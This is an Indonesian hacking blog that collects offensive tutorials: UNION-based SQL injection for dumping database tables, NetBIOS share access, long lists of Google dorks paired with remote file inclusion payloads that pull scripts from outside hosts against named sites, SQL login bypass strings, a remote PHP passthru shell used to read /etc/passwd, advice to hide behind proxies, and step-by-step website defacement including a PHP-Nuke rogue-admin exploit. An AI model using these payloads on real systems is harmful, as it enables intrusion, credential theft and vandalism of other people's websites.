Selasa, 23 Februari 2010

LATIHAN HACK INJEK SQL

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

Nah itu artinya SQL Injection, untuk translate ke bahasa sesuai yg ada mengerti silahkan di translate sendiri. :D.
Ok, SQL Injection itu sendiri dapat terjadi oleh beberapa faktor, di antaranya kesalahan setting pada server yang memungkinkan seorang attacker memasukkan karakter dan baris perintah yg membahayakan bagi program, selain itu juga kesalahan dalam coding yg tidak memfilter karakter yg diinputkan oleh user.

Sudah cukup basa basinya.. sekarang sedikit tutorialnya.. :D.
Pertama., carilah sasaran yang mau di injek - injek SQL nya.. Lha nyarinya dimana mas?? tanya lah pada rumput yg bergoyang dombret nyarinya… wjwkwkwkwk.. Nyari di google, misal’e dengan kata kunci

inurl:news.php?id= site:com

Nah.. buanyak bgt kan hasilnya…. sekarang tinggal kita coba satu buat test..
Misal kita menemukan sebuah site dengan alamat sebagai berikut….

http://www.target.com/english/news.php?id=64

Tahap selanjutnya mari kita tambahkan tanda petik (’) diakhir angka 64.. Ups… ternyata muncul kek gini..

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

Mungkin pada nanya.. mangnya kenapa kalo muncul kek gitu mas..?? Ya itu tandanya error kawand… dah nemu yg asyik error nya.. mari kita lanjutkan ketahap berikutnya.., Ilangkan saja tanda ‘ nya, ganti dengan tanda - (minus) jadi seperti berikut

http://www.target.com/english/news.php?id=-64+order+by+100–
Keterangan : angka 100 itu untuk mencari field nya, tanda minus double di belakang digunakan untuk memberikan Comment pada Mysql Query sehingga sistem tidak akan menjalankan perintah selanjutnya.

setelah ditulis kek gitu… ternyata terdapat error.. like this

Unknown column ‘100' in ‘order clause’

Weeh… Column 100 ndak ada katanya… kita perkecil lagi… coba angka angka misal 10,9 dll ok. Sampai dia tidak memunculkan error unknown column tadi… Setelah di dapat angka yang tidak memunculkan error trus langkah selanjutnya kepriben kiye… (walah boso ngendi maneh.. @_@)…

Buat langkah selanjutnya marih kita select column column tersebut. Lha nyara select nya piye, begini, mari kita coba dengan cara yg sederhana.. misalnya tadi g ada error di coloum 9 so, perintahnya like this

http://www.target.com/english/news.php?id=-64+union+select+1,2,3,4,5,6,7,8,9–

Ok, dah running querynya di address bar, tunggu beberapa saat dan berharaplah akan muncul suatu mukjizat.. wkwkwkwkwkwkw. Nah setelah loading selesai, liad di browser, angka berapa ajah yg muncul… (tempat munculnya di tempat seharusnya artikel ato berita muncul). Misal’e yang muncul tuh angka 3, mari kita explore lebih jauh lagi… kita lihat versi dari databasenya. caranya dengan menjalakan seperti ini

http://www.target.com/english/news.php?id=-64+union+select+1,2,version(),4,5,6,7,8,9–

Nah, setelah itu bakal muncul deh versi dari databasenya, bisa aja versinya 5.2, ato 4.0 atau yg lainnya. Setelah dapet versi databasenya, lanjutin deh buat ngedapetin yang namanya table - table nya. Lha caranye gimana Om??? Wes ga usah panjang x lebar, tar jadi luas wkwkwkw… Untuk mysql versi 5, kita bisa manfaatin yang namanya Information_schema, nah kalo versi 4, ya kita hanya bisa berdoa dan berharap alias maen tebak tebakan… wkwkwkwkwkw.

Buat mencari nama table table nya bisa kita lakuin dengan cara seperti ini.

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()–

Query diatas bakal menghasilkan nama nama table yg ada di database sesuai dengan nama database yg di gunakan, dan sudah dech kita tinggal pilih table mana yg bakal kita extract colom2 nya dan buat kita cari isi dari colom2 nya.. :D. . Lha cara mengetahui column nya gmn mas??? Nah lho.. lom taut tho… Ok, buat cari tau nama nama column nya kita butuh bantuin sebuah alat yg gunanya buat meng-convert code ascii ke hexa, gunanya buat mengambil nama column berdasar nama table nya..

Nh tak kasih sekalian website yg nyedian fasilitas buat ngonvert hexa to ascii, bisa di coba di http://centricle.com/tools/ascii-hex/ tinggal kalian masukin nama table dah jadi dech kode ascii nya.. :D dan kita tinggal meng-query buat ngedapetin nama column nya seperti ini

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0xCODEASCITABLE–

Binggo…!!! kita udah ngedapetin nama nama column nya… tinggal deh men-select isinya…

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(nama_column1,0×3a,nama_column2,0×3a,column3),4,5,6,7,8,9+from+nama_tabel–

arti 0×3a : menampilkan karakter : (titik dua).

Dah.. kita dah dapet isi dari table table… tinggal dilanjutin sendiri…

dah selesai ya…

Happi testing esngiel injecktion ya…

MEREMOTE KOMPUTER ORANG

Pernah dengar istilah NetBIOS over TCP/IP?Kalau sudah, sebaiknya lewatkan saja tulisan ini Dan jika belom boleh disimak :)
Tulisan ini tujuan hanya sebagai pembelajaran saja dan agar dapat kita selalu berhati hati. :) Informasi NetBios sebenarnya dapat kita pakai untuk exploitasi sistem lawan dan berikut ini suatu caruntuk exploitasi target yang menggunakan file/printer sharring

Dalam tulisan ini saya asumsikan anda menggunakan win 98
Sebelum kita mulai coba kita find nbtstat.exe
Sebenarnya fungsi file tersebut adalah untuk menampilkan statistik protokol dan koneksi tcp/ip

Langkah langkah exploitasi :)
1. Click Start-->Program-->MS-Dos prompt--> tulis nbtstat lalu enter
2. Click Start-->Run-->tulis nbtstat lalu OK

Kira kira mucul sperti ini :
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S][interval] ]

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh

RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying statistics.

Dari informasi diatas sebenarnya sudah dapat kita ketahui fungsi dari nbtstat.exe

Pada kesempatan ini saya akan coba mengulas 2 option diatas yaitu :
-A
-a

misal kita mau mencoba komputer dengan names belog.wasantara.net.id
maka kita gunakan :
nbtstat -a belog.wasantara.net.id

misal kita mau mencoba komputer dengan ip 192.168.1.1
maka kita gunakan :
nbtstat -A 192.168.1.1

Dari perintah diatas kemungkinan yang muncul adalah :
1. Host not found
2. Dan pesan indah seperti dibawah ini :

--------------------------------------------

NetBIOS Local Name Table

Name Type Status
---------------------------------------------
BELOG <00> UNIQUE Registered
POLOS <00> GROUP Registered
BELOG <03> UNIQUE Registered
BELOG <20> UNIQUE Registered
POLOS <1e> GROUP Registered

---------------------------------------------

Jika muncul pesan Host not found, segera hentikan usaha anda, karena akan buang waktu sia sia :)

Jika muncul pesan indah seperti diatas, sebaiknya anda tarik napas, karena perkerjaan lain akan menunggu.
Dari pesan indah tersebut yang menjadi catatan adalah karakter dengan kode BELOG <20> UNIQUE Registered, karena angka 20 ini adalah informasi file dan printer sharing.

Apa langkah kita selanjutnya ?
Setelah kita mempunyai info diatas, cari file yang bernama :
LMHOST atau HOST (win 9x)

Jika sudah ketemu, buka dengan editor seperti noteped dan tambahkan :
192.168.1.1 BELOG

Kemudian simpan.

Selanjutnya
Click Start-->Find-->Computer
masukan nama atau ipnya

Dan anda pasti akan berteriak girang, karena komputer remote sudah bisa anda jadikan seperti HD secondary anda :)

Selamat :)
nb : sekali lagi, mohon tulisan ini hanya sebagai bahan pembelajaran saja dan bukan digunakan untuk merusak dan dari tulisan ini saya berharap, kita jangan seenaknya membuka file/printer sharing

HACK SITE DENGAN INJEK SQL

Wow klo yang nge bahas ini kayaknya ngga ada abisnya soalnya uptodate tiap menit bahkan detik siapa tuh yang update yahh para hacker didunia ini.trus penulis disini TIDAK bertanggung jawab atas apa yang telah dilakukan oleh Pelakunya penulis hanya sekedar menulis untuk kepentingan SECURITY(bahasa Gaulnya). NGGA BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TULISAN INI.titik

Pembahasan:

------------------------------------------------
keyword:inurl:"/cart.php?m="
contoh:http://www.facesbyfelicia.com/store/cart.php?m=view
ganti tulisn cart.php?m=view dengan admin
jadi http://www.facesbyfelicia.com/store/admin
trus login pake sql username : 'or"=" password :'or"="
------------------------------------------------
keyword inurl:"/modernbill"
contoh:http://billing.ourweb.net/modernbill/
masukin injekannya:include/html/config.php?DIR=http://one-server.us/injek.txt?
jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR=http://one-server.us/injek.txt?
------------------------------------------------
keyword:"Powered by SunShop 3.2" atau: inurl:"/sunshop/index.php?action="
contoh http://www.dohertysgym.com/sunshop/index.php
ganti kata index.php dengan admin jadi : http://www.dohertysgym.com/sunshop/admin
login pake user: admin pass: 'or''='
------------------------------------------------
inurl:"modules.php?name=SQuery"
injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
contoh:http://www.dies-world.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
------------------------------------------------
google:allinurl:com_galleria
injek:components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://one-server.us/item.txt?
contoh:http://www.a1gpracing.net/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt?
------------------------------------------------
google:allinurl:"/auth/lostPassword.php"
contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.php
injek:ldap/authldap.php?includePath=http://one-server.us/item.txt?
jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?includePath=http://one-server.us/item.txt
------------------------------------------------
google:intitle:"Multimedia Flash Website Builder"
contoh:www.webdesignhq.com/sitebuilder/index.php
injek:sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
------------------------------------------------
gogle:"software 2004-2005 by randshop"
contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php?id=20&katid=32&action=detail
injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
------------------------------------------------
keyword;"powered by geeklog"
contoh:http://www.kobe-ch.com/index.php
injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
jadi:http://www.kobe-ch.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
------------------------------------------------
google:inurl:"/product.php?printable=" atau "powered by x-cart"
inurl:"/home.php?printable=" ganti tulisan itu semua dengan admin
kekekek biasa sqlnya cari sendiri ya
------------------------------------------------
keyword:inurl:"/index. php?option=com_rsgallery"
bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item,txt?
contoh:http://www.pass-my-shotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item.txt?
------------------------------------------------
keyword:"Advanced Poll" inurl:/admin/
contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php
bug:common.inc.php?base_path=http://elang13.org/item.txt?
jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php?base_path=http://elang13.org/item.txt?
------------------------------------------------
inurl:"powered by cs-cart"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item/txt?
------------------------------------------------
inurl:"/catalogue.php?cat="
ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas ente ente sekalian nyari sqlnya hak hak hak

inurl:"/DoceboScs" injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://elang13.org/hitam.txt?
inurl:"/DoceboCore" injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboLms" injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboKms" injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboCMS" injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"dload.php"
injekan:pafiledb/includes/pafiledb_constants.php?module_root_path=http://elang13.org/hitam.txt?
------------------------------------------------
"powered by squirrelcart"
injek : squirrelcart/cart_content.php?cart_isp_root=
------------------------------------------------
keyword inurl:/ubbthreads/
injek:addpost_newpoll.php?addpoll=preview&thispath=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"index.php?target=categories"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item.txt?
------------------------------------------------
google : "Exhibit Engine 1.5 RC 4"
injek:photo_comment.php?toroot=http://elang13.org/item.txt?
------------------------------------------------
inurl:"/modules/Forums/
injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/item.txt?
------------------------------------------------
allinurl: includes/include_once.php
bug:includes/include_once.php?include_file=http://elang13.org/item.txt?
------------------------------------------------
allinurl:/phplivehelper/blank.php
injek:initiate.php?abs_path=hhttp://elang13.org/item.txt?
------------------------------------------------
google:"powered by DreamAccount"
injeknya:
auth.cookie.inc.php?da_path=http://elang13.org/item.txt?
auth.header.inc.php?da_path=http://elang13.org/item.txt?
auth.sessions.inc.php?da_path=http://elang13.org/item.txt?
------------------------------------------------
ashopKart20/" ganti tulisan yang ada didepannya ama admin/scart.mdb
------------------------------------------------
inurl:"//comersus/" ganti /store/xxxx.asp dengan
database/comersus.mdb
------------------------------------------------
allinurl:/shop/category.asp/catid=
hapus tuisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses ccnya biasayanya di encrypt
http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp
------------------------------------------------
inurl:"/admin/default.asp"
username:admin password:'or''='
span style="color: rgb(51, 51, 255);">------------------------------------------------
inurl:"/metacart/"
injek : database/metacart.mdb
------------------------------------------------
inurl:"/store/proddetail.asp?prod="
ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
------------------------------------------------
inurl:"/AdminLogin.asp"
login pake sql ini :
usename:1'or'1'='1
password:1'or'1'='1
------------------------------------------------
inurl:"com_a6mambocredits"
http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt
------------------------------------------------
"Welcome to phpMyAdmin" inurl:main.php
------------------------------------------------
filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )
------------------------------------------------
inurl:"com_peoplebook"
inurl:"com_comprofiler"

HACK SITE DENGAN PHP INJEK

Php Injection (updated every day)
Pada kesempatan kali ini kita akan membahas mengenai PhpInjection, apa itu PhpInjection? Bagaimana menemukannya dan bagaimana penanganannya.
Pertama kali kita membutuhkan sedikit keahlian yaitu mengenal sedikit tentang apa dan bagaimana itu script php. Script php merupakan salah satu script yang sampai saat ini banyak digunakan oleh seorang webmaster, disamping rival nya Java. Script php ini begitu 'Powerfull', mengapa dikatakan demikian karena dalam script php ini kita bisa melakukan banyak hal. Mulai dari membuat file, membuat counter, membuat date, membuat bukutamu, membuat forum (salah satunya PhpBB), mengakses database secara langsung maupun juga membuat gambar dan animasi. Kesemuanya itu sudah terdapat dalam fungsi dari script php ini. Nah karena hal itu lah maka masih banyak orang yang menggunakannya untuk membangun sebuah website, selain karena cukup mudah dipelajari.
Disini kita tidak akan membahas mengenai bagaimana melakukan semua itu, karena maaf ini bukan saatnya untuk belajar php tapi saatnya belajar hacking dengan menggunakan kelebihan dari script php dan kelemahan dari webmaster yang menggunakannya. Jadi cukup sudah basa-basinya.
Begitu banyak orang menanyakan bagaimana untuk mencari bugs pada script php yang ada, sebenarnya ilmu ini sudah lama dan tutorial nya juga sudah begitu banyak di tulis oleh berbagai orang pada berbagai website tentang security jaringan dan hacker, baik milik komunitas maupun milik pribadi. Pada kesempatan ini biarlah saya mengulas sedikit dan mengulang kembali tentang injection pada script php yang lebih dikenal dengan nama PhpInjection.

1. Seperti dijelaskan diatas script php banyak memiliki kelebihan dan mudah digunakan. Nah otomatis banyak webmaster yang menggunakan nah otomatis sasaran kita juga semakin banyak (walau untuk sekarang ini hanya sedikit karena webmaster sudah menyadari kekurangannya).
2. Sebelum kita menggunakan ilmu kita dan memulai pencarian kita, jangan lupa selalu siapkan 2 point penting dari semuanya. Apa itu? Tentu saja 'ROKOK' dan 'KOPI'. Nah setelah kita santai dan dapat berkonsentrasi maka kita bisa mulai aksi kita.
3. Pertama kali kita harus mengakui kehebatan dari om 'Google' dari sana lah kita mendapatkan semuanya. Nah untuk menambah kasanah pengetahuan tentang 'Google hack ada baiknya kita membaca buku 'Hack Attack' Cara dan penanggulanganya oleh teman kita dari jasakom.Atau kunjungi saja langsung situs www. jasakom.com.
Nah untuk memulai pencarian kita masukkanlah kata kunci berikut untuk mendapatkan target kita :
Untuk forum :
allinurl:my_egallery site:.org
allinurl:xgallery site:.org
allinurl:coppermine site:.org
allinurl:4nAlbum site:.org
allinurl:PNphpBB2 site:.org
allinurl:ihm.php?p=
allinurl:.php?bodyfile=
allinurl:/default.php?page=home
allinurl:/folder.php?id=
allinurl:main.php?pagina=
allinurl:/modules.php?name=allmyguests
allinurl:AshNews atau allinurl: /ashnews.php
allinurl:ihm.php?p=*
allinurl:kietu/hit_js.php
allinurl:/Popper/index.php?
keyword : "Powered by phpBB 2.0.6"
keyword : "powered by CubeCart 3.0.6"
keyword : "powered by paBugs 2.0 Beta 3"
Keyword : "powered by AllMyLinks"
keyword : /phorum/login.php
keyword : "powered eyeOs"
allinurl:/includes/orderSuccess.inc.php?glob=
allinurl:modules.php?name=Forums

Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword.
Kalo memang rajin coba liat ajah listnya di :
-= http://www.geocities.com/kake_rgb/list.txt =-

4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com
atau kalau kamu tidak berhasil coba dengan list berikut :
Ganti modul :

1. my_egallery: /modules/My_eGallery/public/displayCategory.php?basepath=
2. xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. coppermine: /modules/coppermine/themes/default/theme.php?THEME_DIR
4. 4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath=
5. PNphpBB2 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
7. /Popper/index.php? : /Popper/index.php?childwindow.inc.php?form=
8. kietu : kietu/index.php?kietu[url_hit]=
9. "Powered by phpBB 2.0.6" : &highlight=%2527.include($_GET[a]),exit.%2527&a=
10. "powered by CubeCart 3.0.6" : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
11. "powered by paBugs 2.0 Beta 3" : /class.mysql.php?path_to_bt_dir=
12. "powered by AllMyLinks" : /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
13. /phorum/login.php : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

14. "powered eyeOs" : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. /includes/orderSuccess.inc.php?glob : http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

16 allinurl:modules.php?name=Forums : /modules.php?name=
=============================================================================
http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.injection.com/cmd?

==========================================================================
5. Kalau kamu bisa melihat web jasakom.com, berarti sasaran sudah ditemukan. Jika belum berarti tutup dan beralih lah pada website berikutnya. Sebagai catatan bahwa untuk sekarang begitu banyak web sudah di patch, so jangan patah semangat dan teruslah berusaha. Dan juga jangan lupa semua orang yang membuka website dapat diketahui ipnya dari log file web server, terutama sekarang banyak web jebakan untuk mencatat ip yang mencoba menyerang, so jangan lupa gunakanlah anonymous proxy ato fake address untuk mengaburkan identitas kamu.

6. Nah klo udah dapet target maka mari kita selanjutnya kita harus cari webhosting gratis. Webhosting ini tidak perlu mendukung php.

Kemudian kita buat file dengan nama test.txt (nama file bebas). Isi file tersebut sebagai berikut:

passthru($test);
?>

simpan file tersebut, lalu upload ke webserver yang telah kita cari sebelumnya.

Sekarang kita siap untuk melakukan aksi kita.
Ketikkan di address bar dari browser kita alamat berikut:

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cal

jika kita berhasil maka kita akan mendapatkan respon sebagai berikut:
June 2004 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30


7. Nah klo kamu mau exploit coba yang satu ini :
http://www.example.com/index.php?module=subjects&func=listpages&subid=[SQL]
http://www.example.com/index.php?module=subjects&func=viewpage&pageid=[SQL]
http://www.example.com/index.php?module=subjects&func=listcat&catid=[SQL]

8. Gimana kalo kita masukkan perintah untuk menampilkan password account di server tersebut??

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cat /etc/passwd

Nah kita bisa dapet dech passwd nya. Hmm setelah dapet passwd ngapain lagi yach ... terserah dech. Tapi jangan lah kasian mending kasih tau admin suruh patch sistem. hehehe

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Selasa, 09 Februari 2010

DEFACE WEBSITE LAGI

Cara Deface Website
Diposkan oleh FatkhanSite's

Deface/Defacing atau cyber grafity secara umum diartikan sebagai aktifitas menodai atau
merubah ubah isi suatu halaman web dengan kalimat , image atau link tertentu yang tidak
ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu
halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.
Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface
seperti :

http://www.bandaaceh.go.id
http://www.pertamina.co.id
http://www.transtv.co.id
http://www.setkab.go.id
http://www.pom.go.id
http://www.usni.ac.id

Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target
mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows
2000 dan servernya adalah IIS 5.0/6.0.

Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang
susah dan perlu waktu yang lama untuk menyusup ke server tersebut , ternyata hal
tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,
dalam hal ini gw menggunakan contoh penggunaan web folder pada Windows xp


1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan
menggunakan tool/software terserah anda seperti Frontpage , Macromedia , Note
pad dan lain lain

2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /
default.asp atau nama lain tergantung nama file halaman pertama suatu web
terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di
suatu web

3. Buka My computer pada desktop dan lihat icon web folder

4. Klik 2 kali pada icon web folder tersebut

5. klik 2 kali pada icon add web folder

6. Isikan URL target di popup yang muncul misalkan target kita adalah
http://www.pertamina.co.id maka isikan URL tersebut

7. klik next lalu finish

8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut
dengan file file yang akan tampil pada halaman web apabila kita mengunjungi
web tersebut

9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau
index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,
biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web
milik orang lain , hanya mengingatkan.

10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang
telah kita buat

11. Save di komputer anda.

12. Proses Deface selesai.

Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan
google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau
mencari situs pemerintah ketikan keyword “web: .go.id”
Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari
terjadinya deface yang sangat mudah ini dengan demikian untuk para defacer yang
hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web siteyang hendak anda deface sudah tidak vurn lagi atau sudah di-patch.
Selamat mencoba.

Cara Mudah Deface Remote File Include

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url

[EvilShellInject] = inject rshell / c99 kamu

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com

- Site Oneadmin RFI

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]

- PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

- Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..

Nah setelah itu buadlah sebuad file: index.html

Isi dengan:

Hacked by Nama Kamu


Kemudian upload deh file ke directorynya

kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html

Selasa, 02 Februari 2010

deface website sederhana

cara deface paling sederhana langkah langkahnya sebagai berikut
Buka situs google


kemudian ketik keyword nya ==> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php

Nah ..... kalo sudah ketemu targetnya maka langkah selanjutnya adalah :

1. www.target.com/nuke/index.php


2. www.target.com/nuke/index.php ==> index.php tadi dirubah menjadi admin.php


3. Tambahkan bug ini dibelakang situs tadi :

?op=AddAuthor&add_aid=nino&add_name=nno&add_pwd=ninoalone&add_email=nino@linuxmail.org&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


jadi ketik di url kamu seperti contoh dibawah ini :

www.target.com/nuke/admin.php?op=AddAuthor&add_aid=nino&add_name=nno&add_pwd=ninoalone&add_email=nino@linuxmail.org&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


4. Kalo berhasil, maka di url/browsing kamu akan muncul : www.target.com/nuke/admin.php?op=mod_author


Kalo gak, berarti situs tsb udah di path ama admin nya.


5. Kalo berhasil, disana kamu di suruh login, masukin id & password kamu tadi. Masih ingat kan ???


id=nino ==> liat point 3 diatas
password=ninoalone ==> liat point 3 diatas


Nah . . . kamu sekarang sudah masuk ke "Administration Menu" situs tsb. Berarti kamu sudah mengusai situs tsb sekarang ! Hehehe...

Sekarang kamu pilih gambar Handphone (dibawahnya ada tulisan Messages), lalu ketik :

title ==>Defaced by NinO
content ==>Hey admin.......find your hole and close it..Greetz to everyone at CuPu²
expiration ==> pilih unlimited trus klik tab add messages yang ada di bawah

Kalo sudah, buka url/browsing baru lalu ketikkan situs target tadi, misal : www.target.com/nuke atau www.target.com/nuke/index.php

